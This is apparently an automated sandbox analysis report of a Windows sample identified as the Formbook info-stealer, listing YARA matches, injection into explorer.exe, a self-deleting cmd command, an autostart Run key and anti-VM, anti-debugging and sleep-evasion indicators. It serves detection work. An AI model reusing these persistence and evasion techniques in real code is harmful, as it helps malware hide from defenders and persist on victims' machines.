Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421830 GetLastError,FormatMessageA, 0_2_00421830
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408E98 GetDiskFreeSpaceA, 0_2_00408E98
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004146E8 FindResourceA, 0_2_004146E8
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Roaming\55R0B44T
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: R6o4qCis6s.exe Virustotal: Detection: 77%
Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
Source: C:\Windows\SysWOW64\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\explorer.exe File written: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.ini
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe
Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Unpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00444B40 push 00444BCDh; ret 0_2_00444BC5
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482040 push 00482066h; ret 0_2_0048205E
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472060 push 0047208Ch; ret 0_2_00472084
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00482008 push 00482034h; ret 0_2_0048202C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00474134 push 00474160h; ret 0_2_00474158
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C274 push 0047C2A0h; ret 0_2_0047C298
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C22C push 0046C258h; ret 0_2_0046C250
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047C2C0 push 0047C2ECh; ret 0_2_0047C2E4
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004722F4 push 00472320h; ret 0_2_00472318
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0042A2B4 push 0042A2E0h; ret 0_2_0042A2D8
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 push 0040C78Ch; ret 0_2_0040C784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004703C0 push 004703ECh; ret 0_2_004703E4
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E45C push 0041E502h; ret 0_2_0041E4FA
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046A48C push 0046A4B8h; ret 0_2_0046A4B0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00472498 push 004724C4h; ret 0_2_004724BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428550 push 0042857Ch; ret 0_2_00428574
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A524 push ecx; mov dword ptr [esp], ecx 0_2_0043A528
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046C5F4 push 0046C620h; ret 0_2_0046C618
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004705F4 push 00470620h; ret 0_2_00470618
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047267C push 004726A8h; ret 0_2_004726A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C610 push 0040C78Ch; ret 0_2_0040C784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CA push 0040671Dh; ret 0_2_00406715
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004066CC push 0040671Dh; ret 0_2_00406715
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_004286E8 push 00428714h; ret 0_2_0042870C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A7F8 push 0047A824h; ret 0_2_0047A81C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C78E push 0040C7FFh; ret 0_2_0040C7F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C790 push 0040C7FFh; ret 0_2_0040C7F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0047A798 push 0047A7C4h; ret 0_2_0047A7BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0041E860 push 0041E88Ch; ret 0_2_0041E884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C86E push 0040C89Ch; ret 0_2_0040C894
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C870 push 0040C89Ch; ret 0_2_0040C894

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\explorer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXP

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_0045880C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00428920
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043ED90 IsIconic,GetCapture, 0_2_0043ED90
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00458F00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00458FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 0_2_0043F638
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 0_2_00455888
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00433C54 0_2_00433C54
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\R6o4qCis6s.exe RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\R6o4qCis6s.exe RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 00000000002298D4 second address: 00000000002298DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000000229B3E second address: 0000000000229B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409A70 rdtsc 1_2_00409A70
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 0_2_00457DB0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00433C54 0_2_00433C54
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5632 Thread sleep count: 36 > 30
Source: C:\Windows\explorer.exe TID: 5632 Thread sleep time: -72000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7044 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 0_2_00408D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_00405BE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00421DC0 GetSystemInfo, 0_2_00421DC0
Source: explorer.exe, 00000002.00000000.230987745.0000000005775000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.493684230.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.493684230.0000000005644000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000002.00000002.495473601.0000000006548000.00000004.00000001.sdmp Binary or memory string: 26700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 00000002.00000000.231415908.0000000006414000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$%
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000002.493944220.0000000005775000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAppData
Source: explorer.exe, 00000002.00000002.493817247.00000000056CA000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.237772373.00000000078D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugFlags
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409A70 rdtsc 1_2_00409A70
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0040ACB0 LdrLoadDll, 1_2_0040ACB0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00481D40 VirtualProtect ?,0000F7A0,00000104,?,00000000,0000F7A0,00003000,00000004 0_2_00481D40
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0046D730
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A390AF mov eax, dword ptr fs:[00000030h] 1_2_00A390AF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov ecx, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2F0BF mov eax, dword ptr fs:[00000030h] 1_2_00A2F0BF
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F9080 mov eax, dword ptr fs:[00000030h] 1_2_009F9080
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73884 mov eax, dword ptr fs:[00000030h] 1_2_00A73884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A73884 mov eax, dword ptr fs:[00000030h] 1_2_00A73884
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A8B8D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00A8B8D0
